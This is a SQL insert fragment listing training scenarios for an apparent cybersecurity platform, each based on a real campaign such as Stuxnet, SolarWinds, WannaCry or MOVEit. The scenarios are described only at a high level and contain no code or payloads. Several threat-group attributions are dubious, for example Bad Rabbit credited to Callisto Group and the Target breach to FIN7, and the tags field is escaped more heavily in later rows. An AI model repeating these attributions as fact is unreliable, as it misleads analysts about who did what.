(33, 'Operation Swipe Left', 'FIN6', 'Investigate a breach by FIN6 using Trinity malware to scrape credit card data from a retail giant\'s POS network.', 'In this intermediate-level training scenario, participants will dive into a high-stakes breach investigation involving the notorious cybercrime group FIN6. The group has infiltrated a leading retail company\'s Point-of-Sale (POS) network using compromised vendor credentials. Their goal? To deploy the insidious \'Trinity\' malware, designed to scrape sensitive credit card data directly from RAM before it can be encrypted. As the investigation unfolds, you must trace their steps through the network, piece together the attack sequence, and mitigate the damage.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"FIN6\\\",\\\"Trinity malware\\\",\\\"POS network breach\\\",\\\"cybersecurity training\\\",\\\"credit card data\\\"]\"', '', 5, '2026-01-05 00:09:23', 'FIN6 Breach Simulation: Uncovering Trinity Malware in Retail POS Network', 'Investigate a breach by FIN6 using Trinity malware to scrape credit card data from a retail giant\'s POS network.', 'operation-swipe-left', 1),
(32, 'Operation Cart Skimmer', 'Magecart (Group 12)', 'Experience an intermediate-level Magecart attack scenario with digital skimming and data exfiltration analysis.', 'In this scenario, participants are tasked with analyzing a sophisticated digital skimming attack orchestrated by Magecart Group 12. The attack targets the checkout pages of numerous online stores through a compromised third-party advertising library. Participants will uncover obfuscated JavaScript code and trace the exfiltrated data to an external drop server, simulating real-world cybersecurity challenges.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Magecart\\\",\\\"digital skimming\\\",\\\"cybersecurity training\\\",\\\"JavaScript analysis\\\",\\\"data exfiltration\\\"]\"', '', 3, '2026-01-05 00:06:31', 'Magecart Digital Skimming Attack Simulation', 'Experience an intermediate-level Magecart attack scenario with digital skimming and data exfiltration analysis.', 'operation-cart-skimmer', 1),
(34, 'Operation Primitive Bear', 'Gamaredon (Shuckworm)', 'Simulate a Gamaredon cyber-espionage campaign targeting military personnel with weaponized Word documents and VBScript backdoors.', 'In this training scenario, participants will navigate a simulated cyber-espionage campaign orchestrated by the notorious APT group, Gamaredon, also known as Shuckworm. The operation centers around a high-volume attack targeting military personnel using weaponized Word documents. Trainees will delve into how these documents leverage template injection techniques and incorporate custom VBScript backdoors to facilitate rapid data theft. This exercise will enhance understanding of how such threats manifest in real-world scenarios and prepare analysts to identify and mitigate similar threats.', 'beginner', 0, 1, 0, 60, NULL, '\"[\\\"Gamaredon\\\",\\\"cyber-espionage\\\",\\\"Word document injection\\\",\\\"VBScript backdoor\\\",\\\"military cybersecurity\\\"]\"', '', 3, '2026-01-05 02:58:53', 'Gamaredon Espionage Simulation: Weaponized Word Docs & VBScript Backdoors', 'Simulate a Gamaredon cyber-espionage campaign targeting military personnel with weaponized Word documents and VBScript backdoors.', 'operation-primitive-bear', 1),
(35, 'Operation Energy Bear', 'Dragonfly (Energetic Bear)', 'Simulate Dragonfly\'s strategic intrusion in the energy sector using trojanized ICS software updates.', 'In this scenario, the notorious Dragonfly APT group, also known as Energetic Bear, targets the energy sector by infiltrating the supply chain. The attackers have trojanized legitimate software updates for industrial control systems (ICS) equipment. This operation will train participants to identify the \'Havex\' RAT and trace the network reconnaissance activities within an industrial control network, enhancing their skills in defending critical infrastructure.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Dragonfly APT\\\\\\\",\\\\\\\"ICS security\\\\\\\",\\\\\\\"Havex RAT\\\\\\\",\\\\\\\"cyber threat intelligence\\\\\\\",\\\\\\\"supply chain attack\\\\\\\"]\\\"\"', '', 5, '2026-01-05 03:01:44', 'Dragonfly\'s ICS Supply Chain Attack Simulation', 'Simulate Dragonfly\'s strategic intrusion in the energy sector using trojanized ICS software updates.', 'operation-energy-bear', 1),
(36, 'Operation Hotel Guest', 'DarkHotel', 'Advanced scenario: DarkHotel targets luxury hotel executives via Wi-Fi, delivering Tapaoux malware disguised as updates.', 'In a high-stakes cyber operation, the notorious APT group DarkHotel has launched a precision spear-phishing campaign targeting executives staying at luxury hotels. Leveraging the hotel\'s Wi-Fi network, they deliver sophisticated, signed malware disguised as software updates. Trainees will analyze the Tapaoux malware and investigate certificate spoofing tactics used by the attackers to compromise their high-profile targets.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"DarkHotel\\\\\\\",\\\\\\\"spear-phishing\\\\\\\",\\\\\\\"Tapaoux malware\\\\\\\",\\\\\\\"certificate spoofing\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\"]\\\"\"', '', 5, '2026-01-05 03:03:57', 'DarkHotel Spear-Phishing Attack on Luxury Hotel Executives', 'Advanced scenario: DarkHotel targets luxury hotel executives via Wi-Fi, delivering Tapaoux malware disguised as updates.', 'operation-hotel-guest', 1),
(37, 'Operation Sea Lotus', 'Naikon', 'Investigate Naikon\'s espionage using RoyalRoad and Aria-body in a South China Sea cyber operation.', 'In the geopolitical hotspot of the South China Sea, a sophisticated threat actor, Naikon, has launched a stealthy cyber espionage campaign. Using the RoyalRoad RTF weaponizer, they deliver the Aria-body backdoor, gaining access to sensitive information. This operation requires you to meticulously analyze alerts, trace the attack path, and uncover the command and control infrastructure disguised as legitimate government domains. Your mission is to dismantle this campaign and safeguard regional cybersecurity.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Naikon APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"RoyalRoad exploit\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Aria-body backdoor\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Espionage campaign\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity training\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-05 03:07:33', 'South China Sea Espionage: Uncovering Naikon\'s RoyalRoad Exploit', 'Investigate Naikon\'s espionage using RoyalRoad and Aria-body in a South China Sea cyber operation.', 'operation-sea-lotus', 1),
(39, 'Operation Ghost Writer', 'UNC1151', 'Train on UNC1151\'s tactics in hacking news sites to spread misinformation, from CMS breaches to social media manipulation.', 'In this training scenario, participants will dive into the world of cyber-influence operations orchestrated by UNC1151. This APT group has targeted popular news websites, compromising their CMS accounts to publish false narratives. As the fabricated stories spread, a coordinated effort on social media amplifies the misinformation, challenging trainees to trace the attack and mitigate its impact.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"UNC1151\\\",\\\"cyber-influence\\\",\\\"APT training\\\",\\\"media manipulation\\\",\\\"CMS hacking\\\"]\"', '', 5, '2026-01-05 03:21:54', 'UNC1151\'s Media Manipulation: A Cyber-Influence Training Scenario', 'Train on UNC1151\'s tactics in hacking news sites to spread misinformation, from CMS breaches to social media manipulation.', 'operation-ghost-writer', 1),
(40, 'Operation Wicked Game', 'APT41 (Wicked Panda)', 'Experience an advanced simulation of APT41\'s supply chain attack on the gaming industry, featuring the ShadowPad payload.', 'In this high-stakes training scenario, participants will delve into a sophisticated supply chain attack orchestrated by APT41, a notorious cyber threat group from China. The operation focuses on the gaming industry, where attackers have infiltrated the build environment of a popular game to inject a malicious backdoor, known as ShadowPad, into the game\'s executable. This backdoor is then distributed to millions of unsuspecting players, setting the stage for a widespread cybersecurity breach. Trainees must navigate through a series of alerts to uncover the full scope of the attack and neutralize the threat.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Supply Chain Attack\\\",\\\"APT41\\\",\\\"ShadowPad\\\",\\\"Cybersecurity Training\\\",\\\"Gaming Industry\\\"]\"', '', 5, '2026-01-05 03:25:53', 'Advanced Supply Chain Attack Simulation with APT41', 'Experience an advanced simulation of APT41\'s supply chain attack on the gaming industry, featuring the ShadowPad payload.', 'operation-wicked-game', 1),
(41, 'Operation Heavy Anchor', 'Lazarus (Andariel)', 'Advanced training scenario exploring Lazarus Group\'s cyber-attack on South Korean defense firms to steal sensitive tank and laser weapon designs.', 'In a high-stakes cyber espionage campaign, the notorious Lazarus Group, specifically its Andariel sub-group, has set its sights on the South Korean defense industrial base. Their objective: to infiltrate and exfiltrate sensitive schematics of cutting-edge tank and laser weaponry. Utilizing their signature DTrack malware, the attackers employ a sophisticated kill chain to breach defenses, maintain persistence, and ultimately achieve their goal of intelligence theft.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"DTrack malware\\\\\\\",\\\\\\\"cyber espionage\\\\\\\",\\\\\\\"defense industrial base\\\\\\\",\\\\\\\"APT\\\\\\\"]\\\"\"', '', 5, '2026-01-05 04:00:31', 'Operation Stealth Blueprint: Lazarus Group Targeting Defense Secrets', 'Advanced training scenario exploring Lazarus Group\'s cyber-attack on South Korean defense firms to steal sensitive tank and laser weapon designs.', 'operation-heavy-anchor', 1),
(42, 'Operation Kitty Corner', 'CopyKittens', 'Train to counter CopyKittens\' Matryoshka RAT targeting foreign affairs via DNS tunneling.', 'In this scenario, participants will engage in a simulated espionage campaign orchestrated by the notorious APT group, CopyKittens. The group has set its sights on Ministries of Foreign Affairs, deploying their infamous \'Matryoshka\' RAT to infiltrate and exfiltrate sensitive governmental documents. Participants must decode encrypted DNS traffic to thwart the attackers and secure critical intelligence.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"CopyKittens\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Matryoshka RAT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DNS tunneling\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-05 04:02:16', 'Operation Matryoshka: CopyKittens Espionage Drill', 'Train to counter CopyKittens\' Matryoshka RAT targeting foreign affairs via DNS tunneling.', 'operation-kitty-corner', 1),
(43, 'Operation Rocket Man', 'Rocket Kitten', 'Simulate and analyze Rocket Kitten\'s tactics targeting aerospace firms using \'Gholee\' malware and fake personas.', 'In a world where every byte of data can shape destinies, Rocket Kitten, a notorious APT group, sets its sights on the aerospace industry. Utilizing their infamous \'Gholee\' malware and deceptive social engineering via fake Facebook profiles, they embark on a mission to infiltrate, persist, and exfiltrate critical data. Trainees, prepare to navigate through a web of deceit and cybersecurity challenges.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Rocket Kitten\\\",\\\"Gholee malware\\\",\\\"cybersecurity training\\\",\\\"APT simulation\\\",\\\"aerospace security\\\"]\"', '', 6, '2026-01-06 01:22:55', 'Rocket Kitten\'s Aerospace Intrusion Simulation', 'Simulate and analyze Rocket Kitten\'s tactics targeting aerospace firms using \'Gholee\' malware and fake personas.', 'operation-rocket-man', 1),
(44, 'Operation Jolly Roger', 'Lazarus (WannaCry)', 'Engage in an advanced cybersecurity scenario analyzing the SMB propagation of WannaCry via EternalBlue.', 'In May 2017, the world witnessed a massive ransomware outbreak known as WannaCry, orchestrated by the notorious Lazarus APT group. Exploiting the EternalBlue vulnerability in Microsoft SMB protocol, the ransomware spread rapidly, causing widespread panic and disruption. As a senior cyber threat intelligence analyst, your mission is to dissect this attack, understanding its propagation mechanics, identifying potential kill-switch domains, and determining if decryption is possible without succumbing to ransom demands.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"WannaCry\\\\\\\",\\\\\\\"EternalBlue\\\\\\\",\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"Ransomware\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\"]\\\"\"', '', 8, '2026-01-06 01:32:21', 'Global Ransomware Outbreak Simulation: Analyzing EternalBlue and WannaCry', 'Engage in an advanced cybersecurity scenario analyzing the SMB propagation of WannaCry via EternalBlue.', 'operation-jolly-roger', 1),
(45, 'Operation Blackout', 'Sandworm (NotPetya)', 'Train to identify Sandworm\'s wiper attack masquerading as ransomware via compromised software updates.', 'In this beginner-level training scenario, you\'ll confront a cyber attack orchestrated by the notorious Sandworm group. Disguised as ransomware, the attack spreads through a compromised update of an accounting software, aiming to destroy data and disrupt operations. Participants will learn to identify the master boot record (MBR) overwriting behavior and the use of Mimikatz to harvest credentials, facilitating rapid lateral movement across networks.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sandworm\\\\\\\",\\\\\\\"wiper attack\\\\\\\",\\\\\\\"NotPetya\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"ransomware disguise\\\\\\\"]\\\"\"', '', 5, '2026-01-06 01:35:52', 'Sandworm\'s Ransomware Disguise: MBR Wiper Attack', 'Train to identify Sandworm\'s wiper attack masquerading as ransomware via compromised software updates.', 'operation-blackout', 1),
(46, 'Operation Bad Rabbit', 'Callisto Group? (Unattributed)', 'Investigate Callisto Group\'s ransomware drive-by download attack using fake Adobe Flash updates and analyze the DiskCryptor ransomware code.', 'In a rapidly evolving digital landscape, the Callisto Group has launched a sophisticated ransomware campaign. Utilizing compromised news sites as a vector, unsuspecting users are lured into downloading fake Adobe Flash updates. Once executed, the payload encrypts the victim\'s hard drive using DiskCryptor and propagates through networks via SMB, demanding a hefty ransom. This scenario will take participants through a realistic threat investigation to dissect the attack\'s stages.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"drive-by download\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DiskCryptor\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-06 01:38:27', 'Analyzing Callisto Group\'s Ransomware via Fake Adobe Updates', 'Investigate Callisto Group\'s ransomware drive-by download attack using fake Adobe Flash updates and analyze the DiskCryptor ransomware code.', 'operation-bad-rabbit', 1),
(47, 'Operation False Flag', 'Sandworm (Olympic Destroyer)', 'Investigate a Sandworm cyberattack disrupting a major sporting event, uncovering false flags and true attribution.', 'As the world gathers to witness the grandeur of a major sporting event\'s opening ceremony, chaos ensues as an unexpected cyberattack disrupts the celebration. The attack, attributed to the notorious Sandworm group, carries false flags pointing towards other nations. Participants will deconstruct the malware to trace its true origins, drawing parallels to Sandworm\'s previous operations. This exercise will test your skills in attribution and understanding of advanced persistent threats.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sandworm\\\\\\\",\\\\\\\"Olympic Destroyer\\\\\\\",\\\\\\\"cyberattack\\\\\\\",\\\\\\\"malware analysis\\\\\\\",\\\\\\\"APT Group\\\\\\\"]\\\"\"', '', 5, '2026-01-06 01:43:17', 'Sandworm Cyberattack: Unveiling the Olympic Ceremony Disruption', 'Investigate a Sandworm cyberattack disrupting a major sporting event, uncovering false flags and true attribution.', 'operation-false-flag', 1),
(48, 'Operation Shadow Hammer', 'Barium (Winnti)', 'Investigate a sophisticated supply chain attack that compromised the ASUS Live Update utility, targeting specific MAC addresses.', 'In an unprecedented cyber offensive, APT41, also known as Barium, launched a surgical strike within a mass infection by compromising the ASUS Live Update utility. This operation, dubbed \'Shadow Strike\', saw the deployment of malware targeting specific MAC addresses, revealing a calculated and highly selective attack amidst a sea of potential victims. Trainees must navigate through this complex landscape to uncover the true objectives and mitigate the threats posed by this advanced persistent threat group.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Supply Chain Attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT41\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"ASUS Live Update\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Barium\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 8, '2026-01-06 02:34:49', 'Operation Shadow Strike: The ASUS Supply Chain Breach', 'Investigate a sophisticated supply chain attack that compromised the ASUS Live Update utility, targeting specific MAC addresses.', 'operation-shadow-hammer', 1),
(49, 'Operation Cloud Atlas', 'Inception', 'Train on detecting Inception APT\'s Cloud Atlas malware targeting Eastern European diplomats.', 'In the heart of Eastern Europe, diplomatic entities face a sophisticated threat. The Inception APT group, known for its high-level espionage capabilities, launches a campaign using the elusive Cloud Atlas malware. Leveraging popular cloud storage services, they aim to infiltrate and extract sensitive information while evading detection. As a cybersecurity analyst, you are tasked with unraveling their tactics and protecting critical diplomatic communications.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"cybersecurity training\\\",\\\"APT Inception\\\",\\\"Cloud Atlas malware\\\",\\\"espionage campaign\\\",\\\"Eastern Europe\\\"]\"', '', 3, '2026-01-07 22:28:11', 'Inception APT: Espionage in Eastern Europe', 'Train on detecting Inception APT\'s Cloud Atlas malware targeting Eastern European diplomats.', 'operation-cloud-atlas', 1),
(50, 'Operation Red October', 'Rocra', 'Analyze Rocra\'s malware in a cyber-espionage campaign targeting diplomatic and research sectors.', 'In the shadows of international diplomacy and scientific innovation, a silent threat emerges. Rocra, an advanced persistent threat group, launches a massive cyber-espionage campaign targeting diplomatic, governmental, and scientific research organizations. The objective: to pilfer sensitive, encrypted information and recover deleted data from unsuspecting victims\' USB drives. Trainees must navigate this intricate operation, uncover the Rocra malware framework, and counteract its espionage tactics.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Rocra\\\",\\\"cyber-espionage\\\",\\\"APT\\\",\\\"malware analysis\\\",\\\"data exfiltration\\\"]\"', '', 5, '2026-01-07 22:28:37', 'Operation Red October: Unveiling Rocra\'s Cyber-Espionage Tactics', 'Analyze Rocra\'s malware in a cyber-espionage campaign targeting diplomatic and research sectors.', 'operation-red-october', 1),
(51, 'Operation Flame', 'Equation Group', 'Analyze Equation Group\'s sophisticated malware in the Middle East using MD5 collisions and espionage modules.', 'In the dimly lit corridors of cyberspace, the Equation Group has unleashed a sophisticated malware platform targeting Middle Eastern entities. This scenario requires you to dissect intricate modules for audio recording, Bluetooth sniffing, and screen capture, while unraveling the mystery of MD5 collision attacks used to sign their malware. As tensions rise, your mission is to trace the attackers\' steps, analyze their tactics, and neutralize the threat before critical data is exfiltrated.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Equation Group\\\\\\\",\\\\\\\"cyber-espionage\\\\\\\",\\\\\\\"malware analysis\\\\\\\",\\\\\\\"MD5 collision\\\\\\\",\\\\\\\"Middle East\\\\\\\"]\\\"\"', '', 5, '2026-01-07 22:31:17', 'Unraveling Equation Group\'s Espionage: A Deep Dive into Advanced Malware Tactics', 'Analyze Equation Group\'s sophisticated malware in the Middle East using MD5 collisions and espionage modules.', 'operation-flame', 1);
INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(52, 'Operation Centrifuge Saboteur', 'Equation Group (Stuxnet)', 'Investigate a PLC rootkit by Equation Group causing physical damage to industrial systems.', 'Amidst rising geopolitical tensions, a covert cyber-weapon has been unleashed on critical infrastructure. The Equation Group, with its sophisticated arsenal, has deployed a rootkit targeting industrial PLCs. Your mission is to unravel this operation\'s intricacies, uncovering the plot that manipulates centrifuges while deceiving monitoring systems, ultimately leading to physical sabotage.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"cyber-weapon\\\\\\\",\\\\\\\"industrial control systems\\\\\\\",\\\\\\\"PLC rootkit\\\\\\\",\\\\\\\"Equation Group\\\\\\\",\\\\\\\"Stuxnet\\\\\\\"]\\\"\"', '', 5, '2026-01-07 22:33:37', 'Operation Centrifuge Saboteur', 'Investigate a PLC rootkit by Equation Group causing physical damage to industrial systems.', 'operation-centrifuge-saboteur', 1),
(53, 'Operation Sunburst', 'APT29 (Cozy Bear / Nobelium)', 'Analyze the SolarWinds attack by APT29, focusing on the SUNBURST backdoor and C2 techniques.', 'In December 2020, one of the most sophisticated cyber espionage operations in history was uncovered. APT29, a cyber threat group linked to Russia\'s Foreign Intelligence Service, infiltrated the software supply chain of SolarWinds. By injecting a backdoor known as SUNBURST into an Orion software update, they gained access to multiple high-value targets, including government agencies. This training scenario will guide you through the investigation of this complex supply chain attack, exploring the domain generation algorithm used for command and control, and the second-stage payloads deployed to compromise sensitive networks.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT29\\\\\\\",\\\\\\\"SolarWinds\\\\\\\",\\\\\\\"Cyber Espionage\\\\\\\",\\\\\\\"Supply Chain Attack\\\\\\\",\\\\\\\"SUNBURST\\\\\\\"]\\\"\"', '', 8, '2026-01-07 22:37:57', 'Advanced Cybersecurity Training: APT29\'s SolarWinds Supply Chain Attack', 'Analyze the SolarWinds attack by APT29, focusing on the SUNBURST backdoor and C2 techniques.', 'operation-sunburst', 1),
(54, 'Operation Sony Spectacle', 'Lazarus Group (North Korea)', 'Beginner-level training on the Sony Pictures hack by Lazarus Group, focusing on Destover malware analysis and data exfiltration tracing.', 'In 2014, the entertainment industry was rocked by a devastating cyberattack on Sony Pictures, attributed to the notorious Lazarus Group. This training scenario invites you to step into the shoes of a cybersecurity analyst, dissecting the infamous attack. You\'ll analyze the destructive \'Destover\' wiper malware, trace complex proxy chains used for data exfiltration, and delve into the geopolitical motivations that drove this high-profile breach.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sony Pictures hack\\\\\\\",\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"Destover malware\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"beginner\\\\\\\"]\\\"\"', '', 7, '2026-01-07 22:38:59', 'Cybersecurity Training: Analyzing the Sony Pictures Hack by Lazarus Group', 'Beginner-level training on the Sony Pictures hack by Lazarus Group, focusing on Destover malware analysis and data exfiltration tracing.', 'operation-sony-spectacle', 1),
(55, 'Operation Bullseye', 'FIN7 / Anunak', 'Investigate the FIN7 APT Target breach, tracing from HVAC vendor compromise to POS malware and payment network infiltration.', 'During the bustling holiday season, a major retail chain, Target, fell victim to an orchestrated cyberattack. This operation simulates the breach orchestrated by the notorious FIN7 group, also known as Anunak, which led to the compromise of 40 million credit cards. Participants will follow the trail from an unsuspecting HVAC vendor compromise to sophisticated RAM-scraping malware infiltrating POS systems and finally, uncover the lateral movements within the payment network.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Target breach\\\\\\\",\\\\\\\"FIN7\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"APT\\\\\\\",\\\\\\\"POS malware\\\\\\\"]\\\"\"', '', 5, '2026-01-08 21:59:26', 'FIN7\'s Retail Breach: Uncovering the Target Holiday Heist', 'Investigate the FIN7 APT Target breach, tracing from HVAC vendor compromise to POS malware and payment network infiltration.', 'operation-bullseye', 1),
(56, 'Operation Credit Bureau', 'Chinese State-Sponsored (Unattributed)', 'Train on responding to the Equifax breach; analyze Apache Struts exploitation and persistence tactics.', 'In 2017, Equifax faced a catastrophic data breach, exposing 147 million Americans\' personal data. This scenario immerses you in the incident response team tasked with analyzing and mitigating the attack. You will navigate through the exploitation of Apache Struts vulnerability CVE-2017-5638, uncover the undetected dwell time, and understand the persistence mechanisms employed by a Chinese state-sponsored APT group.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Equifax breach\\\",\\\"Apache Struts\\\",\\\"CVE-2017-5638\\\",\\\"cybersecurity training\\\",\\\"APT\\\"]\"', '', 10, '2026-01-08 22:03:35', 'Operation Breach Analysis: Equifax 2017 Incident Response Training', 'Train on responding to the Equifax breach; analyze Apache Struts exploitation and persistence tactics.', 'operation-credit-bureau', 1),
(57, 'Operation Log4Chaos', 'Multiple (Chinese APTs, Ransomware Groups)', 'Advanced training on Log4Shell exploitation by Chinese APTs and ransomware groups. Analyze JNDI payloads and cryptominer deployments.', 'In late 2021, a critical vulnerability known as Log4Shell (CVE-2021-44228) began affecting millions of Java applications worldwide. As organizations scrambled to patch, Chinese APTs and ransomware groups initiated a mass exploitation campaign. Trainees will navigate through the chaotic landscape, analyzing JNDI injection payloads and cryptominer deployments while racing against time to defend critical systems.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Log4Shell\\\",\\\"APT\\\",\\\"Ransomware\\\",\\\"Cybersecurity Training\\\",\\\"JNDI Injection\\\"]\"', '', 5, '2026-01-08 22:08:03', 'Operation Log4Shell: APT and Ransomware Exploit Race', 'Advanced training on Log4Shell exploitation by Chinese APTs and ransomware groups. Analyze JNDI payloads and cryptominer deployments.', 'operation-log4chaos', 1),
(58, 'Operation MOVEit Mayhem', 'Cl0p (TA505)', 'Train on Cl0p\'s zero-day exploitation of MOVEit, focusing on SQL injection, mass data theft, and unique extortion tactics.', 'In this scenario, the notorious Cl0p group has discovered a zero-day vulnerability in the widely-used MOVEit file transfer platform. As organizations worldwide unknowingly expose sensitive data due to an SQL injection flaw, Cl0p orchestrates an unprecedented mass data theft. Uniquely, the group opts for a strategic extortion model, choosing not to deploy ransomware encryptors, challenging security teams to respond without the typical encryption-based clues.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Cl0p\\\\\\\",\\\\\\\"Zero-Day Exploitation\\\\\\\",\\\\\\\"SQL Injection\\\\\\\",\\\\\\\"MOVEit Platform\\\\\\\",\\\\\\\"Cyber Extortion\\\\\\\"]\\\"\"', '', 5, '2026-01-08 22:11:08', 'Cl0p\'s Zero-Day Exploitation of MOVEit: A Cybersecurity Training Scenario', 'Train on Cl0p\'s zero-day exploitation of MOVEit, focusing on SQL injection, mass data theft, and unique extortion tactics.', 'operation-moveit-mayhem', 1),
(59, 'Operation ProxyShell', 'Multiple (Hafnium, LockBit, Conti)', 'Investigate APT and ransomware exploitation of Microsoft Exchange vulnerabilities for web shell deployment and privilege escalation.', 'In early 2021, Microsoft Exchange servers worldwide became prime targets due to critical vulnerabilities. These security gaps were rapidly weaponized by both state-sponsored APT groups like Hafnium and financially-motivated ransomware operators such as LockBit and Conti. Trainees will investigate the exploitation chain, from initial access to data exfiltration, understanding the threat landscape\'s complexity.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Microsoft Exchange vulnerabilities\\\",\\\"APT groups\\\",\\\"ransomware\\\",\\\"cybersecurity training\\\",\\\"web shell\\\"]\"', '', 5, '2026-01-08 22:14:11', 'Operation Exchange Exploit: APTs and Ransomware', 'Investigate APT and ransomware exploitation of Microsoft Exchange vulnerabilities for web shell deployment and privilege escalation.', 'operation-proxyshell', 1),
(60, 'Operation Meat Grinder', 'REvil (Sodinokibi)', 'Learn to respond to the REvil ransomware attack on JBS Foods by analyzing tactics, tracing Bitcoin payments, and investigating fund recovery.', 'In May 2021, JBS Foods, a global meat processing giant, was hit by a notorious ransomware attack orchestrated by the REvil group. The attack disrupted meat production across North America and Australia, leading to an $11 million Bitcoin ransom payment. In this training scenario, you will step into the shoes of a cyber threat analyst. Your mission is to unravel the intricate layers of this attack, trace the ransom payment, and understand the FBI\'s role in recovering part of the funds. Prepare to dive deep into the tactics of REvil\'s affiliates and strengthen your cyber defense skills.', 'novice', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"REvil\\\\\\\",\\\\\\\"ransomware\\\\\\\",\\\\\\\"JBS Foods\\\\\\\",\\\\\\\"Bitcoin tracing\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\"]\\\"\"', '', 3, '2026-01-11 23:32:33', 'REvil Ransomware Training: Tracing JBS Foods Attack and Bitcoin Ransom', 'Learn to respond to the REvil ransomware attack on JBS Foods by analyzing tactics, tracing Bitcoin payments, and investigating fund recovery.', 'operation-meat-grinder', 1),
(61, 'Operation Meat Grinder', 'REvil (Sodinokibi)', 'Master an expert-level response to the REvil ransomware attack on JBS Foods, tracing ransom payments and analyzing FBI fund recovery.', 'In this expert-level training scenario, participants will be immersed in the high-stakes environment following the REvil group’s notorious ransomware attack on JBS Foods. The attack, which halted meat production across North America and Australia, resulted in a staggering $11 million Bitcoin ransom payment. Trainees will work to trace the digital ransom trail, dissect the affiliate\'s advanced tactics, and delve into the FBI\'s partial recovery of funds, unraveling the sophisticated layers of this cyber offensive.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"REvil\\\",\\\"ransomware\\\",\\\"JBS Foods\\\",\\\"cybersecurity training\\\",\\\"Bitcoin ransom\\\"]\"', '', 5, '2026-01-11 23:34:33', 'Expert Response to REvil\'s JBS Foods Ransomware Attack', 'Master an expert-level response to the REvil ransomware attack on JBS Foods, tracing ransom payments and analyzing FBI fund recovery.', 'operation-meat-grinder', 1),
(62, 'Operation BlackEnergy', 'Sandworm (Russian GRU Unit 74455)', 'Investigate Sandworm\'s 2015 cyberattack on Ukraine\'s power grid via BlackEnergy malware and KillDisk wiper.', 'In December 2015, the world witnessed the first confirmed cyberattack on a power grid. The notorious Sandworm group, a Russian cyber military unit, executed a meticulously planned attack that plunged 230,000 Ukrainians into darkness. Trainees will dissect the sophisticated use of BlackEnergy malware, the destructive KillDisk wiper, and the manipulation of SCADA systems, unraveling the methods behind this landmark cyber assault.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Sandworm\\\",\\\"BlackEnergy\\\",\\\"KillDisk\\\",\\\"SCADA\\\",\\\"Cyberattack\\\"]\"', '', 5, '2026-01-11 23:36:40', 'Advanced Analysis of Sandworm\'s 2015 Ukrainian Power Grid Attack', 'Investigate Sandworm\'s 2015 cyberattack on Ukraine\'s power grid via BlackEnergy malware and KillDisk wiper.', 'operation-blackenergy', 1),
